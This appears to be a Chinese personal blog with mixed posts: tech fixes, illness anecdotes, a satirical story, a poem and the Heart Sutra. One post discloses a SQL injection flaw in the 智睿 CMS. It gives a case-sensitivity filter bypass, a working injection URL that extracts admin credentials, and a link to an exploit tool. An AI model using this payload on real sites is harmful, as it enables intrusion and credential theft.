Sablog:"上传附件发生意外错误"的解决方案
今天在一国外主机上安装好Sablog后现在上传附件时提示如下错误信息:
"上传附件发生意外错误",经过测试后发现此错误是出现在:admin/uploadfiles.php的第62行。
PHP的move_uploaded_file函数无法将附件复制到附件目录。
同时我发现在新生成的存放附件的目录date_200801目录下没有生成index.htm此文件,
由此我怀疑是否生成的这个目录权限不对,但是在FTP中检查后发现此目录的权限为drwxrwxrwx。
但是当我把Sablog的“附件存放方式”改为“全部存放同一目录”后,文件上传却为正常。
于是,在FTP中删除date_200801目录后,然后再新建date_200801目录,并将权限设置为777,重新上传附件,此时却正常,不再有“上传附件发生意外错误”。
呵呵,因此判断发生此问题应该是服务器的权限设置可能有问题,Sablog的上传功能不存在问题。
解决方案是:Sablog的“附件存放方式”改为“全部存放同一目录”,同是正确设置那个目录的权限。
或者是每个月到attachments目录去建"date_年月"的目录并将权限设置为777。
收工!
前几天头一直难受,一直忍着,直到昨晚去看医生。
看了医生了,还打了针,吃了药,美美的睡了一觉,早上醒来,一切OK。
知道医生怎么说的不?
医生说我头疼是因为用脑过度,我靠,想想也有道理,有时集中精神几个小时,头就疼了,难受了,还真的有点用脑过度。。。
不过,这脑袋不是越用越灵活的吗?怎么还会过度呢?这点就不懂了。。。
长智齿了,智慧来了
长智齿了,疼死我了
活了小半生,还会长牙齿,真他妈的奇怪了
百度了一下智齿的资料:
齿,学名第三大臼齿,俗称智慧齿、立事牙、尽头牙,是口腔最靠近喉咙的牙齿,如果全部生长出来一共4颗,上下颚各两颗,一般是于16岁或之后才生长出来,相较于幼儿时期长出的乳齿与儿童时期更换的恒齿,智齿通常是在人类心智已经趋于成熟时才长出,因而得名。另有同名小说和电影《智齿》。
嘿嘿,,,长智慧了我。。。
具体的参见百度百科
http://baike.baidu.com/view/524.htm
帮我买个单--中国最佳社会现实作品奖
同学聚会,自从毕业后,好多同学都混得有模有样,我却默默无闻,在一家工厂当制图员,每月和丈夫一起靠着不多的收入共同撑着这个家。我本不打算去,可禁不起同学们的一片盛情,只好答应。丈夫正在帮儿子复习功课,儿子就要上初中了,为了上一所好中学,这段时间丈夫没少操心,东奔西走,至今还没着落呢。看了儿子一眼,我走出了家门。天安酒店是高级酒店,我走进包房的时候,同学们都已到齐。还没坐稳,一张张名片就飞了过来,一看一个个不是总经理就是带长的,就连以前成绩总是甩尾的阿辉也当上了派出所所长。望着服务小姐端上眼花缭乱的菜肴,我真感叹自己孤陋寡闻,光这一桌就足以抵我三个月的收入了。阿辉像宴席的主人一样不停地招呼大家吃,不时地为这个斟酒、为那个夹菜,嘴里还说:"只管吃,算我的。"大伙也没任何拘束,一
轮接一轮地交杯把盏、海阔天空地闲聊。酒足饭饱之后,天色已不早,此次聚会该结束了。可究竟谁埋单,我看大伙好像都没有要慷慨解囊的意思。这时候阿辉掏出手机,按了一串号码,然后说:"小李,今晚所里扫黄抓到人没有?哦!刚抓到———好!好!随便送一个到天安酒店来给我埋单。"说完,他得意地把手机放进了口袋,一旁的同学跟着哄笑起来。十五分钟不到,一个中年人就进来了,他看了账单,不禁皱了皱眉头,看来他身上的现钞也不足。他随即也拿出手机,拨了一串号码,说:"廖公吗?我是马校长呀!你儿子要转学读我们学校的事,我今天就给你拍板定下来了……不过我今晚请朋友吃饭,你过来埋单好吗?在天安酒店203包厢……"二十分钟后,有人敲了敲包厢的门,门被打开了。当我见到戴着副高度近视眼镜的丈夫站在门口时,我晕倒了……
==
有点严肃,有点搞笑,有点可怜……
这就是中国啊
悲惨的我 赶上潮流了--红眼病
最近红眼病红遍大江南北
从来不走潮流的我
也迎上了这个潮流
我老婆和家人都不能避免
唉
郁闷了
各位博友注意身体了
摘录了一些东东:
红眼病多是双眼先后发病,患病早期,病人感到双眼发烫、烧灼、畏光、眼红,自觉眼睛磨痛,像进入沙子般地滚痛难忍,紧接着眼皮红肿、眼眵多、怕光、流泪,早晨起床时,眼皮常被分泌物粘住,不易睁开。有的病人结膜上出现小出血点或出血斑,分泌物呈粘液脓性,有时在睑结膜表面形成一层灰白色假膜,角膜边缘可有灰白色浸润点,严重的可伴有头痛、发热、疲劳、耳前淋巴结肿大等全身症状。
===
(1)初起时,眼睑及结膜肿胀,可用冷敷,每日3次,每次20分钟。当一眼患红眼,另一眼尚未感染时,应防止健眼亦受传染,在冲洗或滴眼药时,应将头偏向患侧,睡觉时头也应偏向患侧,以防分泌物流入健眼。
(2)分泌物增多时,每日用生理盐水或温开水冲洗眼睛3~4次,将眼内分泌物清洗干净。应注意:患红眼病时切忌包盖眼,因为包盖眼后,眼睛里的温度增高,有利于病菌生长、繁殖,分泌物不易排出,反而使炎症加重。
(3)眼部可滴0.25%氯霉素或其他消炎眼药水,每2小时一次,临睡前涂用消炎眼膏。有人在患红眼病时,要求医生给打消炎针来治疗,其实没这必要,消炎针对红眼病所起的作用很小。如果婴幼儿红眼较严重,而滴眼药又比较困难时,可口服磺胺乳剂等。
教你几招“防红术”
在这种红眼热浪袭击的日子,怎样才能保证不被“红眼”缠上身呢?眼科医生说,首先要做好预防工作,必须以预防为主。
首先,做到不接触患者用过的洗脸用具、手帕及治疗使用过的医疗器具。一旦与病人接触后必须洗手消毒以防交叉感染,并且最好不要帮红眼病人滴药或是使用他们的药水;游泳前后最好能滴一两滴抗菌素眼药水,可有效预防“红眼病”。
而预防红眼病的关键是注意个人卫生,一旦发现病人,应立即切断传播途径 。医生告诫红眼病患者,为了他人的安全,最好不要再工作,因为一旦坚持在办公室工作,这就会使整个办公室人员都容易被感染。而患者也应自觉不到公共场所或与他人接触。
同时医生提醒市民最好不要到处串门,尽量减少聚会、外出就餐,防止细菌传染。在接触过诸如公车扶手等类似的传播广泛的设施之后,一定要勤洗手。不要用餐厅的毛巾擦脸。要提倡流水洗手,不要用手揉眼,在红眼病等传染病高发季节,尽量不游泳,以防经污染的水进入眼中引起炎症。
必要时要配备一些预防的药水如氯霉素等。
我没错,我坚决承认我没错。
手机被我砸了,风扇被我踢了
我坚决承认,那不是我的错
是她太让人生气,太让人受不了
我没错
你妈的,你跑吧
反正一次也是跑,两次也是跑,都习惯了
一点点的小脾气,你就跑,跑啊,跑啊,你跑的再远一点啊
跑的就不用再回来了
我忍受够了
一次,两次,三次……
你要我忍到什么时候
你要我什么时候才有尽头
两个人在一起,有你这样的吗
跑吧,跑吧,你尽量的跑吧
有多远你就跑多远
你以为
我还会去追吗
你以为
我还会去求你回来吗
你以为
两个人在一起 这样跑跑就能解决问题的吗
跑吧,跑吧,尽量的跑吧
你也清醒一下
我也省心一下
大家都好
这样两个人都好
都好
智睿网站管理系统通杀0day
智睿网站管理系统通杀0day
为什么说通杀,因为他的代码都是自己写的,目前测试杀企业网站管理系统和学校网站管理系统
不多说,看代码,首先看info_show.asp文件代码,其他文件类似
dim ClassId,TopID,ClassName,Inid,SeoTitle,LePl
ClassId=request.QueryString("ClassId") //这里ClassId为过滤
TopID=request.QueryString("TopID")
Inid=int(request.QueryString("InfoId"))
LePl=Request.form("LePl")
Call SeoUi("zhi_rui_E_io_Class","info",ClassId)//这里调用自己写的函数SeoUi带入数据库查询
Call Kio("zhi_rui_E_io","info",Inid)
但是开始调用了--#include file="Include/Nsql.asp"-防注入文件,坏就坏在这个防注入文件上,看代码;
dim SQL_inj,SQL_Get,SQL_Data,Sql_Post
SQL_inj = split(DataNsql,"|")
If Request.QueryString<>"" Then
For Each SQL_Get In Request.QueryString
For SQL_Data=0 To Ubound(SQL_inj)
if instr(Request.QueryString(SQL_Get),Sql_Inj(Sql_DATA))>0 Then
Response.Write "Script Language=javascript>alert('注意:请不要提交非法请求!\nHttp://Www.ZhiRui.net');history.back(-1)Script>"
Response.end()
end if
next
Next
End If
If Request.Form<>"" Then
For Each Sql_Post In Request.Form
For SQL_Data=0 To Ubound(SQL_inj)
if instr(Request.Form(Sql_Post),Sql_Inj(Sql_DATA))>0 Then
Response.Write "Script Language=javascript>alert('注意:请不要提交非法请求!\nHttp://Www.ZhiRui.net');history.back(-1)Script>"
Response.end()
end if
next
next
end if
貌似很正常防注入代码,没什么问题,但是还是有问题的,仔细看这处if instr(Request.Form(Sql_Post),Sql_Inj(Sql_DATA))>0 Then
呵呵,少了什么,对就是Lcase函数。也就是说现在的防注入只防and 但是不防And,instr函数只返回字符位置,并不会去比较大小写,修补办法就是加上Lcase函数,改成Lcase(Request.Form(Sql_Post)),知道了问题的原因,我们再来看看都过滤了那些字符,DataNsql="and|exec|insert|select|delete|update|count|chr|mid|master|truncate|char|declare|set|from|="
注意,最后一个过滤了等号,因为等号没办法转换大小写啊,但是也没事,大不了我不用等号,like也行啊,大于小于号也行啊,给出注入语句
http://test.3est.com/info_Show.asp?InfoId=175&ClassId=27%20And%201>2%20Union%20Select%201,Password%2Badminname%20From%20zhi_rui_e_manage
由于过滤了等号,这里我使用了1>2来使他出错,执行后面的联合查询。
漏洞已通知官方,和官方相谈胜欢,也得到了不少好处,所以这个洞推迟了几天。这几天时间里写了个利用程序,如图:
其中infoid和classid填写你在搜索引擎中看到的id,
下载去我的网盘吧,为这点可怜的小空间,就不在这传了,源码和工具都在,注意我在程序里加了声音,可能有点大,没办法,为了让程序会说话,
http://cid-31cbc2374bc1f024.skydrive.live.com/home.aspx
在tool文件夹里 zhirui.rar
晕倒,今天早上一打开网站,竟然出错,去域名提供商那儿看看域名解析,没有出错,空间提供商那儿也是正常的,很郁闷,再试试输入st999.cn又可以正常访问,就是不能带www,想了想,还是去空间提供商那儿修改了域名接入,以前的域名管理是st999.cn,又增加了个www.st999.cn,还好,二十分钟左右就恢复正常了,不知道是DNS临时出问题还是我增加的这个www.st999.cn另名的效用。。。
QQ农场检验farmkey失败
今天一客拿了台机子过来,是个古董机子,卡的要命,问题是QQ农场不行,腾讯真是造孽,搞了地下城~X5那些游戏,出来些什么非法模块,现在QQ农场又净出问题,真是失败,还那么嚣张,真是失败中的失败,可惜,我也堕落了,不得不用它们的QQ产品!!!
我看那客户的机子,进了农场时摘果子时,提示检验farmkey失败,机子又卡的不行,无法做些检查,清理COOKIE查杀恶意软件什么的,百度了下,总归是两方面的问题:
一个是浏览器问题
一个是机器时间不对头
我一看,果然,那古董机子的时候是2001年,晕,果然够古的,竟然还是2001年的板子。将时间改了过来,再打开农场,果然可以了。。
真是郁闷,那么老的机子现在还有人在用。
那女的就不能少买些化妆品的钱,买台新机子吗!
真是的,都什么世道了,还有01年的机子,不得不写个服字!
观自在菩萨 行深般若波罗蜜多时
照见五蕴皆空 度一切苦厄
舍利子
色不异空 空不异色
色即是空 空即是色
受想行识 亦复如是
舍利子
是诸法空相 不生不灭
不垢不净 不增不减
是故空中无色 无受想行识
无眼耳鼻舌身意 无色声香味触法
无眼界 乃至无意识界
无无明 亦无无明尽
乃至无老死 亦无老死尽
无苦集灭道 无智亦无得 以无所得故
菩提萨陲 依般若波罗蜜多故
心无挂碍 无挂碍故 无有恐怖
远离颠倒梦想,究竟涅磐
三世诸佛 依般若波罗蜜多故
得阿耨多罗三藐三菩提
故知般若波罗蜜多
是大神咒 是大明咒 是无上咒
是无等等咒 能除一切苦 真实不虚
故说般若波罗蜜多咒
即说咒曰 揭谛揭谛 波罗揭谛
波罗僧揭谛 菩提娑婆诃
般若波罗密多心经
